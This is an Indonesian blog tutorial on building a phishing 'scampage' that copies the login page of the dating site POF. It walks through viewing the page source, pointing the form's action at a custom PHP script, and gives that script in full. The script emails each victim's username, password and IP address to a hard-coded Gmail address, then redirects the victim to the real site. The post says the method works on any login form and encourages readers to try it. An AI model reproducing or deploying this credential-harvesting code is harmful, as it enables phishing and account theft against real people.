Tutorial Membuat SCAMPAGE LOGIN Berlaku Untuk Semua!

SCAMPAGE LOGIN
Keco - Tutorial Membuat SCAMPAGE LOGIN Berlaku Untuk Semua!

Di tengah maraknya aksi penipuan yang telah ramai di lakukan oleh para pelaku kejahatan di internet, salah satunya yang juga telah di beritakan oleh salah satu media online.

Anda dapat melihat daftar penipuan http://www.liputan6.com/tag/penipuan begitu banyak kasus penipuan dengan berbagai modus kejahatan.

Kemajuan jaman juga membawa pola pikir para pelaku kejahatan menjadi semakin canggih pula tentunya, dan pada postingan kita kali ini kita akan membahas tentang proses membuat halaman penipuan scampage yang biasanya dikirim secara masal atau sering disebut spam, serta pelaku spam adalah spammer!

Adapun cara membuat Scampage Login seperti di bawah:

Hal yang pertama harus anda lakukan adalah View Source , View Source berguna untuk menampilkan code dalam website seperti yang sudah kita ketahui bahwa web page online terdiri dari beberapa code program HTML & PHP. Disini penulis akan memberikan contoh untuk kasus ini kita memakai salah satu website biro jodoh luar negeri POF yang dapat pembaca kunjungi lewat link berikut http://www.pof.com

 view-source:http://www.pof.com kemudian anda cari kalimat action=" dan ubah login https://www.pof.com/processLogin.aspx ke halaman yang anda inginkan. Tapi disini kita akan meredirect victim ke dalam file php yang kita buat untuk menyaring username dan password yang telah di input oleh target. Jadi ubah action="file.php" cukup simpel.

  Selanjutnya buat file.php dengan code di bawah ini :

<?
$adddate=date("D M d, Y g:i a");
$ip = getenv("REMOTE_ADDR");
$message .= "------------Cara Membuat Scampage Semua web---------------------\n";
$message .= "Username : ".$_POST['username']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "---------------Created BY ?---------------\n";
$recipient = "linuxmoney01@gmail.com";#Email
$subject = "|Pof|";#Judul Pesan
$header = "From:";
$header .= $_POST['eMailAdd']."\n";
$header .= "MIME-Version: 1.0\n";
         if (mail($recipient,$subject,$message,$headers))
    {
     header("Location: http://www.pof.com/");#Halaman redirect

    }
else
        {
   echo "ERROR! Please go back and try again.";#Pesan error bila server /usr/bin/mail die!
      }

?>

Dari sini anda sudah selesai, namun ada satu catatan kembali untuk pembaca adalah bahwa .$_POST di peroleh dari View Source pada name=" di login form website biro jodoh POF, tutorial ini juga berlaku untuk semua web login yang menggunakan login action. Selamat mencoba!


Tidak ada komentar:

Write a Comment


Top